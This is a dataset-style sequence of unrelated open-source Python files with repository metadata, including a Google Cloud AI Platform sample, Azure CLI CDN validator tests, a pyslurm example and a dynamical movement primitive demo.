    fit.ship.boostItemAttr("warpSpeedMultiplier", bonus,
                           skill="Caldari Propulsion Systems")
|
bsmr-eve/Pyfa
|
eos/effects/subsystembonuscaldaripropulsion2warpspeed.py
|
Python
|
gpl-3.0
| 337
|
# -*- coding: utf-8 -*-
# License LGPL-3.0 or later (http://www.gnu.org/licenses/lgpl.html).
from . import mail_mail
from . import mail_mass_mailing
from . import mail_mass_mailing_list
from . import mail_unsubscription
|
open-synergy/social
|
mass_mailing_custom_unsubscribe/models/__init__.py
|
Python
|
agpl-3.0
| 221
|
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Generated code. DO NOT EDIT!
#
# Snippet for UpdateFeature
# NOTE: This snippet has been automatically generated for illustrative purposes only.
# It may require modifications to work in your environment.
# To install the latest published package dependency, execute the following:
# python3 -m pip install google-cloud-aiplatform
# [START aiplatform_generated_aiplatform_v1beta1_FeaturestoreService_UpdateFeature_async]
from google.cloud import aiplatform_v1beta1
async def sample_update_feature():
    """Illustrative call to FeaturestoreService.UpdateFeature (v1beta1).

    Generated sample — sends a minimal Feature with only `value_type` set;
    client credentials/endpoint come from the environment's default config.
    """
    # Create a client
    client = aiplatform_v1beta1.FeaturestoreServiceAsyncClient()
    # Initialize request argument(s)
    feature = aiplatform_v1beta1.Feature()
    feature.value_type = "BYTES"
    request = aiplatform_v1beta1.UpdateFeatureRequest(
        feature=feature,
    )
    # Make the request
    response = await client.update_feature(request=request)
    # Handle the response
    print(response)
# [END aiplatform_generated_aiplatform_v1beta1_FeaturestoreService_UpdateFeature_async]
|
googleapis/python-aiplatform
|
samples/generated_samples/aiplatform_generated_aiplatform_v1beta1_featurestore_service_update_feature_async.py
|
Python
|
apache-2.0
| 1,617
|
#!/usr/bin/env python
# Example: query Slurm job information via pyslurm.
# NOTE(review): Python 2 script (print statements).
import pyslurm
a = pyslurm.job()
# CPUs allocated to jobs on the node named "shivling".
print pyslurm.slurm_job_cpus_allocated_on_node("shivling")
jobs = a.get()
print jobs
|
phantez/pyslurm
|
examples/job_test.py
|
Python
|
gpl-2.0
| 144
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import unittest
from unittest import mock
from azure.cli.command_modules.cdn._validators import validate_origin
from knack.util import CLIError
class ValidatorTests(unittest.TestCase):
    """Unit tests for the CDN `validate_origin` namespace validator."""

    @staticmethod
    def _namespace_with_origin(http_port, https_port=None):
        """Build a mock CLI namespace containing a single mock origin."""
        namespace = mock.MagicMock()
        origin = mock.MagicMock()
        origin.http_port = http_port
        if https_port is not None:
            origin.https_port = https_port
        namespace.origins = [origin]
        return namespace

    def test_validate_origin_passes_on_empty(self):
        # An untouched mock namespace carries no invalid ports to reject.
        namespace = mock.MagicMock()
        self.assertEqual(validate_origin(namespace), True)

    def test_validate_origin_on_http_port_range_high(self):
        # 65537 exceeds the maximum TCP port (65535).
        namespace = self._namespace_with_origin(http_port=65537)
        with self.assertRaises(CLIError):
            validate_origin(namespace)

    def test_validate_raise_on_https_port_range_high(self):
        namespace = self._namespace_with_origin(http_port=80, https_port=65537)
        with self.assertRaises(CLIError):
            validate_origin(namespace)

    def test_validate_raise_on_http_port_range_low(self):
        namespace = self._namespace_with_origin(http_port=-1, https_port=443)
        with self.assertRaises(CLIError):
            validate_origin(namespace)

    def test_validate_raise_on_https_port_range_low(self):
        namespace = self._namespace_with_origin(http_port=80, https_port=-443)
        with self.assertRaises(CLIError):
            validate_origin(namespace)
|
yugangw-msft/azure-cli
|
src/azure-cli/azure/cli/command_modules/cdn/tests/latest/test_validators.py
|
Python
|
mit
| 1,899
|
# This file is part of DmpBbo, a set of libraries and programs for the
# black-box optimization of dynamical movement primitives.
# Copyright (C) 2014 Freek Stulp, ENSTA-ParisTech
#
# DmpBbo is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# DmpBbo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with DmpBbo. If not, see <http://www.gnu.org/licenses/>.
## \file demoDmpChangeInitial.py
## \author Freek Stulp
##
## \ingroup Demos
## \ingroup Dmps
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
import os, sys
lib_path = os.path.abspath('../')
sys.path.append(lib_path)
lib_path = os.path.abspath('../../python')
sys.path.append(lib_path)
from functionapproximators.FunctionApproximatorLWR import *
from dmp.Dmp import *
from dmp.Trajectory import *
from dmp.dmp_plotting import *
def getDemoTrajectory(ts):
    """Generate a 2-D demonstration trajectory over the time steps ``ts``.

    Depending on the hard-coded ``use_viapoint_traj`` flag, returns either a
    polynomial trajectory passing through a viapoint, or a minimum-jerk
    trajectory between two states.
    """
    use_viapoint_traj = True
    n_dims = 2

    if use_viapoint_traj:
        y_first = -0.2 * np.ones(n_dims)
        y_last = 0.1 * np.ones(n_dims)
        if n_dims == 2:
            y_last[1] = -0.8
        viapoint_time = 0.25
        viapoint_location = -0.5 * np.ones(n_dims)
        if n_dims == 2:
            viapoint_location[1] = -0.8
        # Pack [position, velocity, acceleration] at the viapoint; only the
        # position entries are non-zero (velocity/acceleration stay zero).
        y_yd_ydd_viapoint = np.zeros(3 * n_dims)
        y_yd_ydd_viapoint[:n_dims] = viapoint_location
        return Trajectory.generatePolynomialTrajectoryThroughViapoint(
            ts, y_first, y_yd_ydd_viapoint, viapoint_time, y_last)

    # Alternative: straight minimum-jerk trajectory between two states.
    y_first = np.linspace(0.0, 0.7, n_dims)  # Initial state
    y_last = np.linspace(0.4, 0.5, n_dims)   # Final state
    return Trajectory.generateMinJerkTrajectory(ts, y_first, y_last)
if __name__ == '__main__':
    # GENERATE A TRAJECTORY
    tau = 0.5
    n_time_steps = 51
    ts = np.linspace(0, tau, n_time_steps)  # Time steps
    trajectory = getDemoTrajectory(ts)  # getDemoTrajectory() is implemented above
    y_init = trajectory.initial_y()
    y_attr = trajectory.final_y()
    n_dims = trajectory.dim()

    # WRITE THINGS TO FILE
    # NOTE(review): the directory says "ChangeGoal" although this demo changes
    # the *initial* state; kept as-is so companion scripts reading this path
    # keep working -- confirm before renaming.
    directory = "/tmp/demoDmpChangeGoalPython"
    trajectory.saveToFile(directory, "demonstration_traj.txt")

    # MAKE THE FUNCTION APPROXIMATORS (one LWR approximator per dimension)
    function_apps = [FunctionApproximatorLWR(10), FunctionApproximatorLWR(10)]
    sigmoid_max_rate = -20
    dmp = Dmp(tau, y_init, y_attr, function_apps, "Dmp", sigmoid_max_rate)

    # CONSTRUCT AND TRAIN THE DMP
    dmp.train(trajectory)

    # Execute for longer than the demonstrated duration so convergence is visible.
    tau_exec = 0.7
    n_time_steps = 71
    ts = np.linspace(0, tau_exec, n_time_steps)

    # INTEGRATE DMP TO GET REPRODUCED TRAJECTORIES, one per shifted initial state
    for goal_number in range(7):
        y_init_variant = y_init + (0.2 * (goal_number - 3)) * np.ones(n_dims)

        # ANALYTICAL SOLUTION
        dmp.set_initial_state(y_init_variant)
        (xs, xds, forcing_terms, fa_outputs) = dmp.analyticalSolution(ts)
        traj_reproduced = dmp.statesAsTrajectory(ts, xs, xds)
        basename = "reproduced" + str(goal_number)
        traj_reproduced.saveToFile(directory, basename + "_traj.txt")

        # NUMERICAL INTEGRATION, step by step
        dt = ts[1]
        xs_step = np.zeros([n_time_steps, dmp.dim_])
        xds_step = np.zeros([n_time_steps, dmp.dim_])
        dmp.set_initial_state(y_init_variant)
        (x, xd) = dmp.integrateStart()
        xs_step[0, :] = x
        xds_step[0, :] = xd
        for tt in range(1, n_time_steps):
            (xs_step[tt, :], xds_step[tt, :]) = dmp.integrateStep(dt, xs_step[tt - 1, :])
        traj_reproduced = dmp.statesAsTrajectory(ts, xs_step, xds_step)
        basename = "reproduced_num" + str(goal_number)
        traj_reproduced.saveToFile(directory, basename + "_traj.txt")

    print("Plotting")
    for numerical_or_analytical in [1, 2]:
        fig = plt.figure(numerical_or_analytical)
        if numerical_or_analytical == 1:
            fig.suptitle("Analytical Solution")
        else:
            fig.suptitle("Numerical Integration")
        axs1 = [fig.add_subplot(231), fig.add_subplot(232), fig.add_subplot(233)]
        axs2 = [fig.add_subplot(234), fig.add_subplot(235), fig.add_subplot(236)]

        # BUG FIX: numpy is imported as "np"; the original "numpy.loadtxt"
        # raised a NameError at runtime.
        trajectory = np.loadtxt(directory + "/demonstration_traj.txt")
        traj_dim0 = trajectory[:, [0, 1, 3, 5]]  # columns: time + dim-0 pos/vel/acc
        traj_dim1 = trajectory[:, [0, 2, 4, 6]]  # columns: time + dim-1 pos/vel/acc
        lines = plotTrajectory(traj_dim0, axs1)
        lines.extend(plotTrajectory(traj_dim1, axs2))
        plt.setp(lines, linestyle='-', linewidth=8, color=(0.4, 0.4, 0.4))

        for goal_number in range(7):
            basename = "reproduced" + str(goal_number)
            if numerical_or_analytical == 2:
                basename = "reproduced_num" + str(goal_number)
            trajectory = np.loadtxt(directory + "/" + basename + "_traj.txt")
            traj_dim0 = trajectory[:, [0, 1, 3, 5]]
            traj_dim1 = trajectory[:, [0, 2, 4, 6]]
            lines = plotTrajectory(traj_dim0, axs1)
            lines.extend(plotTrajectory(traj_dim1, axs2))
            plt.setp(lines, linestyle='--', linewidth=3, color=(0, 0.7, 0))

        labels = ["Demonstration"]
        plt.legend(labels)

    plt.show()
|
stulp/dmpbbo
|
demos_python/dmp/demoDmpChangeInitial.py
|
Python
|
lgpl-2.1
| 5,839
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.